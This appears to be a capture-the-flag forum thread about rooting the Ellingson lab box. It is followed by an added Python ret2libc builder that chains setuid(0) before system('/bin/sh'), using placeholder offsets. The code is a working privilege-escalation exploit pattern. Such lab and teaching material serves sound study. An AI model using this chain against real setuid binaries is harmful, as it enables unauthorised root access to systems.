Got User
Thanks @AzAxIaL for nudging me to follow the path and the guidance on the questions, and to make sure I read everything and really look at what is there. I was kinda blind. In the end, quite straightforward to user: basic commands needed, etc.
Spent a long time on the initial connection, purely because I missed the first piece of the required key… again a PEBKAC.
Next challenge: root…
Finally rooted, thanks for the help and hints. A manual approach based on Bitterman with some adjustments and tweaks worked for me. Had the exploit working for a while, but only as the M***o user. Took some more time to successfully switch over to root.
The user part is simple, but if you do not want to wait: they do not really listen to The Plague.
Root: bitterman + redcross and you are good to go. The remote libc is different, so ssh in and dump it there, not on Kali.
Can anyone DM me on root? I'm testing my exploit locally, it's running well but I'm not getting root, only a normal user.
You need an extra step in your chain. If you have popped the shell as a regular user, it should be trivial to add this extra call: just before invoking the shell, you need to explicitly set the user id you want.
Just look at the man page for this C function to locate its signature, pop the arguments, call this function in a second step (instead of the shell call), return to main again, and this time make the shell call and you'll get your privileged shell.
You don't need to return to main a second time, just do both in the same payload.
For those testing locally: in my Kali the exploit didn't work, though when I opened the SSH tunnel and used the addresses of the libraries on ellingson it worked fine.
Jejejeje, yes it all makes sense, I'll try it as you say. When after some hard sweat I got it working, I admit I was so happy jumping around that I didn't notice that… Thanks for your advice, and sorry to anyone that followed my not-completely-right answer, sorry.
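The two points made in the replies above, put into one chain builder: set the uid explicitly before spawning the shell, both in the same payload with no second return to main, and compute every address from a libc leak using offsets taken from the target's libc rather than the local one. This is an added example, not code posted by anyone in the thread and not Ellingson's real layout: the libc symbol offsets, gadget offsets, padding length and leaked address below are constructed placeholders, and the code uses only the standard library (no pwntools).

```python
import struct

# Constructed placeholder offsets (NOT the real Ellingson libc). In practice,
# take these from the libc dumped off the target box, because a local Kali
# libc has different symbol and gadget offsets and the chain lands on garbage.
LIBC_OFFSETS = {
    "puts":        0x0809c0,   # symbol used for the info leak
    "setuid":      0x0e5970,   # setuid(uid_t)
    "system":      0x04f440,   # system(const char *)
    "/bin/sh":     0x1b3e9a,   # "/bin/sh" string inside libc
    "pop_rdi_ret": 0x02155f,   # gadget: pop rdi ; ret
    "ret":         0x0008aa,   # gadget: ret (16-byte stack alignment for system)
}


def p64(value):
    """Pack one little-endian 64-bit qword for the stack."""
    return struct.pack("<Q", value)


def libc_base(leaked_puts, offsets=LIBC_OFFSETS):
    """Recover the libc load base from a leaked puts address.

    A correct base is page-aligned; a non-aligned result is the classic sign
    that the offsets belong to a different libc than the one that leaked.
    """
    base = leaked_puts - offsets["puts"]
    if base & 0xfff:
        raise ValueError("leak does not match these libc offsets (wrong libc?)")
    return base


def build_chain(base, pad_len, offsets=LIBC_OFFSETS, uid=0):
    """One payload: setuid(uid) followed directly by system("/bin/sh").

    pad_len is the assumed number of bytes from the start of the overflow up to
    the saved return address. Without the setuid() call first, a shell spawned
    from a setuid-root binary drops back to the real (unprivileged) uid, which
    is exactly the "shell but not root" symptom from the thread.
    """
    pad = b"A" * pad_len
    chain = [
        base + offsets["pop_rdi_ret"], uid,                        # rdi = 0
        base + offsets["setuid"],                                  # setuid(0)
        base + offsets["pop_rdi_ret"], base + offsets["/bin/sh"],  # rdi = "/bin/sh"
        base + offsets["ret"],           # alignment gadget; drop if the frame is already aligned
        base + offsets["system"],                                  # system("/bin/sh")
    ]
    return pad + b"".join(p64(addr) for addr in chain)


def decode_chain(payload, pad_len):
    """Unpack the qwords after the padding, for inspection and testing."""
    body = payload[pad_len:]
    return [struct.unpack("<Q", body[i:i + 8])[0] for i in range(0, len(body), 8)]


if __name__ == "__main__":
    # Constructed leak value for the stand-alone run.
    base = libc_base(0x7ffff7a649c0)
    payload = build_chain(base, pad_len=72)
    print("libc base: %#x" % base)
    for qword in decode_chain(payload, 72):
        print("%#018x" % qword)
```

The leak-to-base step is where the "works on Kali, fails remotely" problem from the thread shows up: the alignment check in `libc_base` fails loudly instead of producing a chain full of wrong addresses. Setting up the SSH tunnel and pointing the exploit at the target's libc, as described above, is what makes the offsets and the leak agree.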